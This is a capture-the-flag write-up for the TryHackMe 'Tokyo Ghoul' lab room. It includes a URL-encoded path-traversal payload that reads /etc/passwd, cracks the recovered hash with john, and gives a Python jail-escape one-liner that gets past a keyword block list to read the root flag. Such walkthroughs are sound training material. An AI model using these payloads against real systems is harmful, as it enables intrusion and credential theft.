Hello guys it’s ouranos again , in this write-up i will solve the tokyo ghoul room from try hack me .
Where am i ?
So we gonna start by doing a quick scan using nmap :
┌─[ouranos@parrot]─[~/ctf/thm/tokyo]
└──╼ $sudo nmap -A -T4 $IP
As we can see we have 3 open ports :
Ftp with anonymous login : 21
Ssh : 22
Http , apache ubuntu version : 80
Planning to escape
After knowing the open ports i will navigate trough the website and inspect elements look for anything specious
after a while i found a note in jasonroom.html , that’s a hint about getting to the ftp server , so let’s go to the ftp server
┌─[ouranos@parrot]─[~/ctf/thm/tokyo]
└──╼ $ftp $your IP
After getting into some directories in the ftp i found 2 files
so i downloaded them using get
ftp> get rize_and_kaneki.jpg
ftp> get need_to_talk
after downloading them we know the first one is an executable and the second one is a jpg , i executed the program
The executable wait for a paraphrase , i used strings to pull it
┌─[ouranos@parrot]─[~/ctf/thm/tokyo]
└──╼ $strings need_to_talk
The program gaved us another string i think this is related to the picture so i used steghide
we got a txt file with an encoded string , use cyber chef to decode it
from morsecode →hex→ base64
What Rize is trying to say?
We found the hidden directory
This directory need to be scanned :
┌─[ouranos@parrot]─[~/ctf/thm/tokyo]
└──╼ $sudo dirb http://$machine_IP/secret_directory
so we found a directory using dirb :
after clicking a while i saw this parameter who call a file in the server
index.php?view=flower.gif
maybe we can change it to get back and get the /etc/passwd
nop it didn’t work but we know now that there is a vulnerability there so we need to bypass it using html url encoding
?view=%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
voila we got the /etc/passwd with a username and a hash , i’ll crack this hash using john
first thing we put the hash in a file
┌─[ouranos@parrot]─[~/ctf/thm/twd/box]
└──╼ $echo ‘$hash’ > hash.txt
and we crack it
┌─[ouranos@parrot]─[~/ctf/thm/twd/box]
└──╼ $john — wordlist=/usr/share/wordlists/rockyou.txt hash.txt
after a while we see the password
┌─[ouranos@parrot]─[~/ctf/thm/twd/box]
└──╼ $john — show hash.txt
and we got our ssh creds
Privillage esculation :
We are on the ssh , so i’ll see our permissions :
we have access as root to execute jail.py , so let’s see what is this
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
print(“Hi! Welcome to my world kaneki”)
print(“========================================================================”)
print(“What ? You gonna stand like a chicken ? fight me Kaneki”)
text = input(‘>>> ‘)
for keyword in [‘eval’, ‘exec’, ‘import’, ‘open’, ‘os’, ‘read’, ‘system’, ‘write’]:
if keyword in text:
print(“Do you think i will let you do this ??????”)
return;
else:
exec(text)
print(‘No Kaneki you are so dead’)
if __name__ == “__main__”:
main()
this is our script , the script won’t let us execute commands who read internal files , we should escape this to read the root flag using using Built-in functions:
__builtins__.__dict__[‘__IMPORT__’.lower()](‘OS’.lower()).__dict__[‘SYSTEM’.lower()](‘cat /root/root.txt’)
and finally we got our root , thank you for trying this room , i hope you enjoyed and you learned something new -0UN4N05
